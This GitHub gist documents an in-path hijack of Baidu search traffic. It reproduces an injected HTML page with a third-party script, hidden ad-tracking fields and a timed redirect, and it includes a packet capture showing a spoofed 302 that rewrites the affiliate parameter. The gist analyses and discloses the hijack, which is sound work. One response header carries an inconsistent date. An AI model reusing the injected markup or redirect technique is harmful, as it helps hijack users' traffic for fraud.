Skip to content

Instantly share code, notes, and snippets.

@nevill

nevill/Hijacked packets

Last active August 29, 2015 14:06
Show Gist options
  • Save nevill/760fd8a10d657eb5cd9c to your computer and use it in GitHub Desktop.
Save nevill/760fd8a10d657eb5cd9c to your computer and use it in GitHub Desktop.
Download ZIP
Baidu Hijack
Raw
hijack response.md

Response URL could be: http://9v.c1o1.com/b/location.php?gxsg_url=aHR0cDovL3d3dy5iYWlkdS5jb20vcz9pZT1VVEYtOCZ3ZD1qYXZhJnRuPTk5NzE0NjExX2hhb19wZw==&rurl=aHR0cDovL3d3dy5iYWlkdS5jb20vcz9pZT1VVEYtOCZ3ZD1qYXZh

~ $ http -v get "http://www.baidu.com/s?ie=UTF-8&wd=apple" User-Agent:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.122 Safari/537.36"

GET /s?ie=UTF-8&wd=apple HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, compress
Host: www.baidu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.122 Safari/537.36


HTTP/1.1 200 OK
Cache-Control:no-cache
Cache-Control:no-store
Cache-Control:private
Connection: close
Content-Length: 861
Content-Type: text/html
Date: Tue, 31 Aug 2017 06:20:14 GMT
Server: Apache/1.2.6

<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="pragma" content="no-cache" /><script defer type="text/javascript" src="http://gdprob.b0.upaiyun.com/th/sh0101/ver_sh0101_92/th1009.js"></script></head><body style='margin:0px;overflow-x:hidden;overflow-y:hidden;'><input type="hidden" id="a5" value="http://117.21.173.168:8888/ash4.html"/><input type="hidden" id="m5" value="http://www.baidu.com/s?ie=UTF-8&wd=apple"/><input type="hidden" id="u5" value=""/><input type="hidden" id="a6" value="10034"/><input type="hidden" id="fg" value="1"/><input type="hidden" id="a7" value="sh0101"/><input type="hidden" id="d1" value="1411795908"/></body><script>setTimeout(function(){var a=document.getElementById("fg").value;var b=document.getElementById("m5").value;if(a==1){window.location.href=b};},5000);</script></html>
Raw
Hijacked packets
11:29:35.387693 IP (tos 0x0, ttl 63, id 50801, offset 0, flags [DF], proto TCP (6), length 64)
116.2xx.x.x.53587 > 115.239.211.110.80: Flags [S], cksum 0x5f8f (correct), seq 895062881, win 65535, options [mss 1452,nop,wscale 4,nop,nop,TS val 783494939 ecr 0,sackOK,eol], length 0
0x0000: 4500 0040 c671 4000 3f06 95fc 74ea 2302 E..@.q@.?...t.#.
0x0010: 73ef d36e d153 0050 3559 9361 0000 0000 s..n.S.P5Y.a....
0x0020: b002 ffff 5f8f 0000 0204 05ac 0103 0304 ...._...........
0x0030: 0101 080a 2eb3 2f1b 0000 0000 0402 0000 ....../.........
11:29:35.394412 IP (tos 0x0, ttl 55, id 50801, offset 0, flags [DF], proto TCP (6), length 64)
115.239.211.110.80 > 116.2xx.x.x.53587: Flags [S.], cksum 0x2bbb (correct), seq 117149092, ack 895062882, win 65535, options [mss 1440,nop,wscale 7,nop,nop,nop,nop,nop,nop,nop,nop,nop,nop,nop,nop,sackOK,eol], length 0
0x0000: 4500 0040 c671 4000 3706 9dfc 73ef d36e E..@.q@.7...s..n
0x0010: 74ea 2302 0050 d153 06fb 8da4 3559 9362 t.#..P.S....5Y.b
0x0020: b012 ffff 2bbb 0000 0204 05a0 0103 0307 ....+...........
0x0030: 0101 0101 0101 0101 0101 0101 0402 0000 ................
11:29:35.395600 IP (tos 0x0, ttl 63, id 51573, offset 0, flags [DF], proto TCP (6), length 40)
116.2xx.x.x.53587 > 115.239.211.110.80: Flags [.], cksum 0x618a (correct), seq 895062882, ack 117149093, win 16384, length 0
0x0000: 4500 0028 c975 4000 3f06 9310 74ea 2302 E..(.u@.?...t.#.
0x0010: 73ef d36e d153 0050 3559 9362 06fb 8da5 s..n.S.P5Y.b....
0x0020: 5010 4000 618a 0000 P.@.a...
11:29:35.395719 IP (tos 0x0, ttl 63, id 10431, offset 0, flags [DF], proto TCP (6), length 214)
116.2xx.x.x.53587 > 115.239.211.110.80: Flags [P.], cksum 0x7e71 (correct), seq 895062882:895063056, ack 117149093, win 16384, length 174
0x0000: 4500 00d6 28bf 4000 3f06 3319 74ea 2302 E...(.@.?.3.t.#.
0x0010: 73ef d36e d153 0050 3559 9362 06fb 8da5 s..n.S.P5Y.b....
0x0020: 5018 4000 7e71 0000 4745 5420 2f73 3f77 P.@.~q..GET./s?w
0x0030: 643d 6261 6279 2670 6e3d 3130 266f 713d d=baby&pn=10&oq=
0x0040: 2545 3625 3839 2542 4525 4535 2538 3125 %E6%89%BE%E5%81%
0x0050: 3943 2545 3825 4244 2541 3625 4535 2539 9C%E8%BD%A6%E5%9
0x0060: 4325 4241 2669 653d 7574 662d 3826 7273 C%BA&ie=utf-8&rs
0x0070: 765f 7061 6765 3d31 2666 3d38 2672 7376 v_page=1&f=8&rsv
0x0080: 5f62 703d 3126 746e 3d62 6169 6475 2048 _bp=1&tn=baidu.H
0x0090: 5454 502f 312e 310d 0a55 7365 722d 4167 TTP/1.1..User-Ag
0x00a0: 656e 743a 2063 7572 6c2f 372e 3330 2e30 ent:.curl/7.30.0
0x00b0: 0d0a 486f 7374 3a20 7777 772e 6261 6964 ..Host:.www.baid
0x00c0: 752e 636f 6d0d 0a41 6363 6570 743a 202a u.com..Accept:.*
0x00d0: 2f2a 0d0a 0d0a /*....
11:29:35.402926 IP (tos 0x0, ttl 53, id 36624, offset 0, flags [DF], proto TCP (6), length 40)
115.239.211.110.80 > 116.2xx.x.x.53587: Flags [.], cksum 0xa012 (correct), seq 117149093, ack 895063056, win 202, length 0
0x0000: 4500 0028 8f10 4000 3506 d775 73ef d36e E..(..@.5..us..n
0x0010: 74ea 2302 0050 d153 06fb 8da5 3559 9410 t.#..P.S....5Y..
0x0020: 5010 00ca a012 0000 P.......
11:29:35.476775 IP (tos 0x0, ttl 58, id 2, offset 0, flags [none], proto TCP (6), length 275)
115.239.211.110.80 > 116.2xx.x.x.53587: Flags [FP.], cksum 0xfa9f (correct), seq 117149093:117149328, ack 895063056, win 256, length 235
0x0000: 4500 0113 0002 0000 3a06 a099 73ef d36e E.......:...s..n
0x0010: 74ea 2302 0050 d153 06fb 8da5 3559 9410 t.#..P.S....5Y..
0x0020: 5019 0100 fa9f 0000 4854 5450 2f31 2e31 P.......HTTP/1.1
0x0030: 2033 3032 204d 6f76 6564 2050 6572 6d61 .302.Moved.Perma
0x0040: 6e65 6e74 6c79 0d0a 4c6f 6361 7469 6f6e nently..Location
0x0050: 3a20 6874 7470 3a2f 2f77 7777 2e62 6169 :.http://www.bai
0x0060: 6475 2e63 6f6d 2f73 3f77 643d 6261 6279 du.com/s?wd=baby
0x0070: 2670 6e3d 3130 266f 713d 2545 3625 3839 &pn=10&oq=%E6%89
0x0080: 2542 4525 4535 2538 3125 3943 2545 3825 %BE%E5%81%9C%E8%
0x0090: 4244 2541 3625 4535 2539 4325 4241 2669 BD%A6%E5%9C%BA&i
0x00a0: 653d 7574 662d 3826 7273 765f 7061 6765 e=utf-8&rsv_page
0x00b0: 3d31 2666 3d38 2672 7376 5f62 703d 3126 =1&f=8&rsv_bp=1&
0x00c0: 746e 3d39 3338 3433 3336 375f 6861 6f5f tn=93843367_hao_
0x00d0: 7067 0d0a 436f 6e6e 6563 7469 6f6e 3a20 pg..Connection:.
0x00e0: 636c 6f73 650d 0a43 6f6e 7465 6e74 2d54 close..Content-T
0x00f0: 7970 653a 7465 7874 2f68 746d 6c0d 0a43 ype:text/html..C
0x0100: 6f6e 7465 6e74 2d6c 656e 6774 683a 300d ontent-length:0.
0x0110: 0a0d 0a ...
11:29:35.478010 IP (tos 0x0, ttl 63, id 34286, offset 0, flags [DF], proto TCP (6), length 40)
116.2xx.x.x.53587 > 115.239.211.110.80: Flags [.], cksum 0x5fff (correct), seq 895063056, ack 117149329, win 16369, length 0
0x0000: 4500 0028 85ee 4000 3f06 d697 74ea 2302 E..(..@.?...t.#.
0x0010: 73ef d36e d153 0050 3559 9410 06fb 8e91 s..n.S.P5Y......
0x0020: 5010 3ff1 5fff 0000 P.?._...
11:29:35.478507 IP (tos 0x0, ttl 63, id 61409, offset 0, flags [DF], proto TCP (6), length 40)
116.2xx.x.x.53587 > 115.239.211.110.80: Flags [F.], cksum 0x5fef (correct), seq 895063056, ack 117149329, win 16384, length 0
0x0000: 4500 0028 efe1 4000 3f06 6ca4 74ea 2302 E..(..@.?.l.t.#.
0x0010: 73ef d36e d153 0050 3559 9410 06fb 8e91 s..n.S.P5Y......
0x0020: 5011 4000 5fef 0000 P.@._...
11:29:35.552919 IP (tos 0x0, ttl 53, id 36625, offset 0, flags [DF], proto TCP (6), length 770)
115.239.211.110.80 > 116.2xx.x.x.53587: Flags [P.], cksum 0x894c (correct), seq 117149093:117149823, ack 895063056, win 202, length 730
0x0000: 4500 0302 8f11 4000 3506 d49a 73ef d36e E.....@.5...s..n
0x0010: 74ea 2302 0050 d153 06fb 8da5 3559 9410 t.#..P.S....5Y..
0x0020: 5018 00ca 894c 0000 4854 5450 2f31 2e31 P....L..HTTP/1.1
0x0030: 2032 3030 204f 4b0d 0a44 6174 653a 2054 .200.OK..Date:.T
0x0040: 7565 2c20 3037 204f 6374 2032 3031 3420 ue,.07.Oct.2014.
0x0050: 3131 3a32 393a 3335 2047 4d54 0d0a 436f 11:29:35.GMT..Co
0x0060: 6e74 656e 742d 5479 7065 3a20 7465 7874 ntent-Type:.text
0x0070: 2f68 746d 6c3b 6368 6172 7365 743d 7574 /html;charset=ut
0x0080: 662d 380d 0a54 7261 6e73 6665 722d 456e f-8..Transfer-En
0x0090: 636f 6469 6e67 3a20 6368 756e 6b65 640d coding:.chunked.
0x00a0: 0a43 6f6e 6e65 6374 696f 6e3a 204b 6565 .Connection:.Kee
0x00b0: 702d 416c 6976 650d 0a56 6172 793a 2041 p-Alive..Vary:.A
0x00c0: 6363 6570 742d 456e 636f 6469 6e67 0d0a ccept-Encoding..
0x00d0: 5365 742d 436f 6f6b 6965 3a20 4241 4944 Set-Cookie:.BAID
0x00e0: 5549 443d 3434 3434 3033 3934 4634 3141 UID=44440394F41A
0x00f0: 3932 4645 4130 3245 4431 3834 3743 3532 92FEA02ED1847C52
0x0100: 3842 4244 3a46 473d 313b 2065 7870 6972 8BBD:FG=1;.expir
0x0110: 6573 3d54 6875 2c20 3331 2d44 6563 2d33 es=Thu,.31-Dec-3
0x0120: 3720 3233 3a35 353a 3535 2047 4d54 3b20 7.23:55:55.GMT;.
0x0130: 6d61 782d 6167 653d 3231 3437 3438 3336 max-age=21474836
0x0140: 3437 3b20 7061 7468 3d2f 3b20 646f 6d61 47;.path=/;.doma
0x0150: 696e 3d2e 6261 6964 752e 636f 6d0d 0a53 in=.baidu.com..S
0x0160: 6574 2d43 6f6f 6b69 653a 2042 445f 434b et-Cookie:.BD_CK
Raw
trigger
A request might trigger the hijack
http://www.baidu.com/s?wd=%E6%89%BE%E5%81%9C%E8%BD%A6%E5%9C%BA&pn=10&oq=%E6%89%BE%E5%81%9C%E8%BD%A6%E5%9C%BA&ie=utf-8&rsv_page=1&f=8&rsv_bp=1&tn=baidu
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment